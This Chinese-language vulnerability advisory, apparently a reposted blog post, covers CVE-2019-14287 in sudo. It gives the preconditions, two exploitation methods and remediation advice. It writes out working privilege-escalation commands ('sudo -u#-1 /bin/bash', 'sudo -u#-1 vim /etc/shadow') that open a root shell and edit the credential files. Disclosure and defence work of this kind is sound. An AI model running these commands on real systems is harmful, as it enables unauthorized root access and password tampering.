CVE-2019-14287 sudo 配置不当-权限提升漏洞预警

CVE-2019-14287 sudo 配置不当-权限提升漏洞预警

0x00 漏洞背景

2019年10月14日, sudo 官方在发布了 CVE-2019-14287 的漏洞预警。
sudo 是所有 unix操作系统(BSD, MacOS, GNU/Linux) 基本集成的一个用户权限控制/切换程序。允许管理员控制服务器下用户能够切换的用户权限。
通过特定payload,用户可提升至root权限。

0x01 漏洞利用前提

sudo -v < 1.8.28
知道当前用户的密码
当前用户存在于sudo权限列表

0x02漏洞方式一

在配置文件中用了 ALL 关键词后造成的。但默认的 sudo 配置文件不受影响。
当 /etc/sudoers 文件存在如下形式的配置会导致漏洞的产生:
在这里插入图片描述
这种*=(ALL, *)形式的配置,简单来说就是对 可以被切换到的用户进行了 ALL(所有用户) 和其他用户的剔除操作。
但是,由于该错误,qwe实际上可以通过运行sudo -u#-1 vi来以root身份运行 vi,这违反了安全策略。

[su qwe]
[sudo -u root vim]
[sudo -u#-1 vim /etc/shadow]
[sudo -u#-1 vim /etc/passwd]

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

普通用户可以编辑/etc/shadow 可以替换root账号的密码

0x03漏洞方式二

在配置文件中用了 ALL 关键词后造成的。但默认的 sudo 配置文件不受影响。
当 /etc/sudoers 文件存在如下形式的配置会导致漏洞的产生:

[visudo]
[su qwe]
[sudo -u#-1 whoami]
[sudo -u#-1 /bin/bash]
[whoami]
[tail -3 /etc/shadow]

在这里插入图片描述在这里插入图片描述

0x04 修复建议

  1. 及时升级到 sudo 1.8.28 版本。
  2. 检索/etc/sudoers 是否存在 ALL 关键词的复合限制逻辑

在这里插入图片描述

在这里插入图片描述

发布了223 篇原创文章 · 获赞 32 · 访问量 7万+

猜你喜欢

转载自blog.csdn.net/qq_41901122/article/details/103823466